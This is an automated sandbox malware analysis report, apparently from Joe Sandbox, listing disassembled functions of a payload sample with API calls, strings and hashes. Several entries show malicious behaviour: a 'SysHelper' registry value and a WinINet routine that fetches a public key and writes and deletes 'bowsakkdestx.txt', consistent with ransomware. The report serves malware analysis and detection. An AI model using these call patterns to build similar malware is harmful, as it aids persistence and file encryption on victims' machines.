                                                                                                                            • Instruction Fuzzy Hash: BEC16F71D01209EBDF00DFA4DD49BDEBBB5BF14308F10442AE405B7291E7B99A19CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$__except_handler4_fprintf
                                                                                                                            • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                            • API String ID: 1783060780-3771355929
                                                                                                                            • Opcode ID: 7079d731d6776abfdfe2453006c3043dd2668468a362b09ea9e244792f7a7836
                                                                                                                            • Instruction ID: ce87abb0f4028845320e2601a733c76b967423be4837c80db7668bcd2f5c36b2
                                                                                                                            • Opcode Fuzzy Hash: 7079d731d6776abfdfe2453006c3043dd2668468a362b09ea9e244792f7a7836
                                                                                                                            • Instruction Fuzzy Hash: 08A172B1C00249EBEF10EF95C956BDFBF75AF10308F14042DE40576292E7BA5648CBA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004C3350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                            • API String ID: 909875538-2908105608
                                                                                                                            • Opcode ID: 601fb9226e58e4c13bcd2044f44ebf095003c98e086bcc708bd04483a72c316e
                                                                                                                            • Instruction ID: 8240e64272c4f650fbbac5631cc545d7236695a19a62bf5d51d63ecfe3a95359
                                                                                                                            • Opcode Fuzzy Hash: 601fb9226e58e4c13bcd2044f44ebf095003c98e086bcc708bd04483a72c316e
                                                                                                                            • Instruction Fuzzy Hash: 69415B79BC834129F7655929BC03FC777815B50B1AF48886FFA88E92C3E688858741AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0046C6C2
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0046C6F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0046C700
                                                                                                                            • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0046C725
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0046C72E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValue$OpenQuery
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                            • API String ID: 3962714758-1667468722
                                                                                                                            • Opcode ID: d935002d961569eaede09362cc8d224887099ea45f02de50f73a2653c1c6e0c9
                                                                                                                            • Instruction ID: 47a4b7530c2c47492d265e308e2820d872026311c0572f8f5994cf9781f23334
                                                                                                                            • Opcode Fuzzy Hash: d935002d961569eaede09362cc8d224887099ea45f02de50f73a2653c1c6e0c9
                                                                                                                            • Instruction Fuzzy Hash: 6E111E75940208FBDB209F90CC4AFEEBF78FF14705F104195EA00B2191E7B15A19AB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0047E707
                                                                                                                              • Part of subcall function 0046C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C51B
                                                                                                                            • InternetOpenW.WININET ref: 0047E743
                                                                                                                            • _wcsstr.LIBCMT ref: 0047E7AE
                                                                                                                            • _memmove.LIBCMT ref: 0047E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0047E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 0047E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0047E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0047E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F6
                                                                                                                            • _strstr.LIBCMT ref: 0047EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0047EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EB7C
                                                                                                                            • _malloc.LIBCMT ref: 0047EB86
                                                                                                                            • _memset.LIBCMT ref: 0047EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0047EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EBB6
                                                                                                                            • _strstr.LIBCMT ref: 0047EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EC32
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                            • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 2805819797-1771568745
                                                                                                                            • Opcode ID: 920ab47d1aa3f86d324baca30e2bf9adcbea66ea8b6ea5862a5b8517ffcdc499
                                                                                                                            • Instruction ID: 1c074ea7080a6dd3ca8b1fc97f1e384f3ed11f6aa9947bcdf21ffc5df3574b87
                                                                                                                            • Opcode Fuzzy Hash: 920ab47d1aa3f86d324baca30e2bf9adcbea66ea8b6ea5862a5b8517ffcdc499
                                                                                                                            • Instruction Fuzzy Hash: 02019230448381AAD630EF119C05BDF7B9CAF55708F04885EF98892182EB78920DC7AB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0048728B Relevance: 12.2, APIs: 8, Instructions: 202COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1678825546-0
                                                                                                                            • Opcode ID: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                                            • Instruction ID: 424f548f24203fab9c79ab730cb735f55d216abbceed208e413a7de76b187101
                                                                                                                            • Opcode Fuzzy Hash: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                                            • Instruction Fuzzy Hash: 6A71A771D092299BDF30AA58CCA8BAEB7B5EB54304F2444DAD908A7241D738DE80DF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004873EA Relevance: 10.6, APIs: 7, Instructions: 129COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964551433-0
                                                                                                                            • Opcode ID: a1f39ce8edf5d141bf583f0b5b0223a63800c28264195af6ae84c2876838b711
                                                                                                                            • Instruction ID: b037b8463d21f02b22fb37b15c6e84235a6df504623ee4d16f667c5135ca8794
                                                                                                                            • Opcode Fuzzy Hash: a1f39ce8edf5d141bf583f0b5b0223a63800c28264195af6ae84c2876838b711
                                                                                                                            • Instruction Fuzzy Hash: BF517471E09128AFDF20AA68CCA9BAE77B5FB04304F1404DAD908A6251E779DF80CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004873FA Relevance: 10.6, APIs: 7, Instructions: 127COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964551433-0
                                                                                                                            • Opcode ID: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                                            • Instruction ID: f2fea00eac1435641bce71dc654833ca56eeda0a53e28c78687972c08c95003c
                                                                                                                            • Opcode Fuzzy Hash: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                                            • Instruction Fuzzy Hash: 78516471D09129AEDF30AA68CCA9BAE77B5EB04304F1404DAD908A6251E739DF80CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004906EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___unDName.LIBCMT ref: 0049071B
                                                                                                                            • _strlen.LIBCMT ref: 0049072E
                                                                                                                            • __lock.LIBCMT ref: 0049074A
                                                                                                                            • _malloc.LIBCMT ref: 0049075C
                                                                                                                            • _malloc.LIBCMT ref: 0049076D
                                                                                                                            • _free.LIBCMT ref: 004907B6
                                                                                                                              • Part of subcall function 004842FD: IsProcessorFeaturePresent.KERNEL32(00000017,004842D1,i;H,?,?,00480CE9,0048520D,?,004842DE,00000000,00000000,00000000,00000000,00000000,0048981C), ref: 004842FF
                                                                                                                            • _free.LIBCMT ref: 004907AF
                                                                                                                              • Part of subcall function 00480BED: HeapFree.KERNEL32(00000000,00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3704956918-0
                                                                                                                            • Opcode ID: 7b83b0165dbd2c684cbaf2ed116174c1eca8af89e51e4b29addd0f5af4d74c31
                                                                                                                            • Instruction ID: f8c217dc36b2cfd9760ea6a82f589ac5a95e45c3b8fa34eaeac99f1b81511e75
                                                                                                                            • Opcode Fuzzy Hash: 7b83b0165dbd2c684cbaf2ed116174c1eca8af89e51e4b29addd0f5af4d74c31
                                                                                                                            • Instruction Fuzzy Hash: A521A971914705AEDB65BBB58845B1FBB94AF04724F50857FF4189B282DB7CE800CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM ref: 00471B1E
                                                                                                                            • timeGetTime.WINMM ref: 00471B29
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471B4C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00471B5C
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471B6A
                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00471B72
                                                                                                                            • timeGetTime.WINMM ref: 00471B78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3697694649-0
                                                                                                                            • Opcode ID: 201cb8417f29f97518eb8715fa11cd0b52ac85b920dbc2a61c21f35a4a8d9be7
                                                                                                                            • Instruction ID: e22111e1a8fc4ac874f932cd817cc5f8ff663f5d2b10c1ffdd4ba5ed3842f039
                                                                                                                            • Opcode Fuzzy Hash: 201cb8417f29f97518eb8715fa11cd0b52ac85b920dbc2a61c21f35a4a8d9be7
                                                                                                                            • Instruction Fuzzy Hash: 3A018832A40319A6DB20D7E99C45FEEB76CBF18B40F044466F704B7191E674B905CBE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00485141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 00485141
                                                                                                                              • Part of subcall function 00487D6C: EncodePointer.KERNEL32(00000000,?,00485146,00483FFE,00567990,00000014), ref: 00487D6F
                                                                                                                              • Part of subcall function 00487D6C: __initp_misc_winsig.LIBCMT ref: 00487D8A
                                                                                                                              • Part of subcall function 00487D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004926B3
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004926C7
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004926DA
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004926ED
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00492700
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00492713
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00492726
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00492739
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0049274C
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0049275F
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00492772
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00492785
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00492798
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004927AB
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004927BE
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004927D1
                                                                                                                            • __mtinitlocks.LIBCMT ref: 00485146
                                                                                                                            • __mtterm.LIBCMT ref: 0048514F
                                                                                                                              • Part of subcall function 004851B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00485154,00483FFE,00567990,00000014), ref: 00488B62
                                                                                                                              • Part of subcall function 004851B7: _free.LIBCMT ref: 00488B69
                                                                                                                              • Part of subcall function 004851B7: DeleteCriticalSection.KERNEL32(0056AC00,?,?,00485154,00483FFE,00567990,00000014), ref: 00488B8B
                                                                                                                            • __calloc_crt.LIBCMT ref: 00485174
                                                                                                                            • __initptd.LIBCMT ref: 00485196
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0048519D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            • Opcode ID: 5170af13b35bfc47d9f46adbe0a5babc83d15f2cf932023ea3d694e95a477813
                                                                                                                            • Instruction ID: 84dca69921717a3d6c4d4ed2404dfee7e71615566e5f58d2805b14def0d132e2
                                                                                                                            • Opcode Fuzzy Hash: 5170af13b35bfc47d9f46adbe0a5babc83d15f2cf932023ea3d694e95a477813
                                                                                                                            • Instruction Fuzzy Hash: 4BF0C232949A112DE6353A7A6C07B4F2A809F01738B210E1FF064D52D5EF5894415799
